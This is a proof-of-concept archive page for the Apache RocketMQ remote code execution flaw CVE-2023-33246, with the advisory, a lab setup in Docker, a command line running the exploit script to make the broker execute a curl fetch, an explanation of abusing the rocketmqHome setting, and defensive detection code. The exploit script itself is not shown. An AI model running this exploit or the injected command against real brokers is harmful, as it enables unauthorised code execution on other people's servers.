Associated Vulnerability
Title: Apache RocketMQ: Possible remote code execution vulnerability when using the update configuration function (CVE-2023-33246)
Description: For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification; an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x, or 4.9.6 or above for using RocketMQ 4.x.
Readme
# CVE-2023-33246: Apache RocketMQ Remote Code Execution
## OVERVIEW
Apache RocketMQ is one of the most popular and widely used distributed messaging and streaming platforms.
A command execution vulnerability has recently been reported in Apache RocketMQ, affecting version 5.1.0 and below. A remote, unauthenticated user can exploit it through the update configuration function to execute commands with the same access level as the RocketMQ user process.
## Essential Components
### Nameserver:
1. The nameserver in RocketMQ acts as a registry or metadata store for the entire messaging infrastructure.
2. It maintains information about topics, queues, and the brokers responsible for handling messages.
3. Clients (producers and consumers) use the nameserver to discover the brokers that they need to communicate with for publishing or consuming messages.
4. The nameserver is responsible for dynamic routing, load balancing, and failover within the RocketMQ cluster.
5. It listens on a specific port (9876 by default) for incoming requests from clients and brokers.
### Broker:
1. Brokers are the workhorses of the RocketMQ system, responsible for storing and managing messages.
2. Each broker manages one or more topics, which are logical channels for message communication.
3. Producers publish messages to specific topics, and consumers subscribe to topics to receive messages.
4. Brokers handle message storage, replication, and delivery to consumers based on subscriptions and message consumption patterns.
5. They maintain message queues for each topic-partition, ensuring efficient message processing and delivery.
6. Brokers communicate with nameservers to register themselves, update metadata, and participate in the cluster's routing and load balancing mechanisms.
## Environment Setup
Set up a local RocketMQ environment via Docker:
```
docker pull apache/rocketmq:4.9.4
# Start nameserver
docker run -d --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.4 sh mqnamesrv
# Start broker
docker run -d --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -p 10909:10909 -p 10911:10911 -p 10912:10912 apache/rocketmq:4.9.4 sh mqbroker -c /home/rocketmq/rocketmq-4.9.4/conf/broker.conf
```
## Usage examples
### 1. Version Check
Using the default config, the RocketMQ cluster starts listening on TCP port 9876 (the nameserver port) for client requests. For example, below is a sample exchange between a client and the server to fetch the RocketMQ version:
```
python3 check.py --ip 127.0.0.1 --port 9876
```

**PCAP**

### 2. Exploit analysis
The UpdateBrokerConfig() function is triggered when a request with RequestCode 25 (UPDATE_BROKER_CONFIG) is received:
```
python3 CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py 127.0.0.1 10911 curl 127.0.0.1/exp
```

**PCAP**

We utilize the "rocketmqHome" server configuration found in the broker.conf file. This configuration sets the value of the environment variable ROCKETMQ_HOME within the RocketMQ user process. Through careful crafting of this value, we can execute commands of our choosing.

This is how the vulnerability works.
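As an added example (not part of the original README or the archived PoC scripts), the following Python decodes the RocketMQ remoting wire format and flags UPDATE_BROKER_CONFIG (code 25) requests that try to set rocketmqHome, which is the traffic pattern a sensor in front of an exposed broker port should alert on. The frame layout and request code are RocketMQ's own; the sample frames are constructed inline with a harmless placeholder path, not captured traffic.

```python
import json
import struct

UPDATE_BROKER_CONFIG = 25            # RequestCode.UPDATE_BROKER_CONFIG
SENSITIVE_KEYS = {"rocketmqHome"}    # keys whose remote update means code execution


def parse_remoting_frame(frame: bytes) -> tuple[dict, bytes]:
    """Split one RocketMQ remoting frame into (JSON header, raw body).
    Layout: 4-byte total length, 4-byte word = serialize type (top byte, 0 = JSON)
    + header length (low 24 bits), then header bytes, then body."""
    if len(frame) < 8:
        raise ValueError("frame too short")
    total_len, hdr_word = struct.unpack(">II", frame[:8])
    serialize_type, hdr_len = hdr_word >> 24, hdr_word & 0x00FFFFFF
    if serialize_type != 0:
        raise ValueError("only JSON-serialized headers are handled here")
    if 4 + hdr_len > total_len or 4 + total_len > len(frame):
        raise ValueError("inconsistent length fields")
    header = json.loads(frame[8:8 + hdr_len].decode("utf-8"))
    body = frame[8 + hdr_len:4 + total_len]
    return header, body


def flag_config_update(frame: bytes) -> list[str]:
    """Return the sensitive keys an UPDATE_BROKER_CONFIG request tries to set."""
    header, body = parse_remoting_frame(frame)
    if header.get("code") != UPDATE_BROKER_CONFIG:
        return []
    hits = []
    # The body is a Java-properties style "key=value" list, one entry per line.
    for line in body.decode("utf-8", "replace").splitlines():
        key, sep, _ = line.partition("=")
        if sep and key.strip() in SENSITIVE_KEYS:
            hits.append(key.strip())
    return hits


def build_frame(code: int, body: bytes) -> bytes:
    """Encode a frame the way the broker decodes it (used only for constructed samples)."""
    header = json.dumps({"code": code, "flag": 0, "language": "JAVA",
                         "opaque": 1, "serializeTypeCurrentRPC": "JSON",
                         "version": 395}).encode("utf-8")
    payload = struct.pack(">I", len(header)) + header + body   # top byte 0 = JSON
    return struct.pack(">I", len(payload)) + payload


# Constructed samples: a config update touching rocketmqHome (placeholder path, no
# command), a benign config update, and a request with an unrelated code.
SAMPLE_UPDATE = build_frame(UPDATE_BROKER_CONFIG, b"rocketmqHome=/tmp/placeholder-home\n")
SAMPLE_BENIGN = build_frame(UPDATE_BROKER_CONFIG, b"brokerName=broker-a\n")
SAMPLE_OTHER = build_frame(105, b"")   # arbitrary other request code
```

Unauthenticated clients have no business changing rocketmqHome, so any hit is worth an alert regardless of the value; a truncated or inconsistent frame raises ValueError rather than being silently accepted.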
File Snapshot
[4.0K] /data/pocs/22bddbc7817e22d721f7d73a0e7a245657a021b2
├── [ 16K] check.py
├── [1.3K] CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py
└── [3.7K] README.md
0 directories, 3 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support.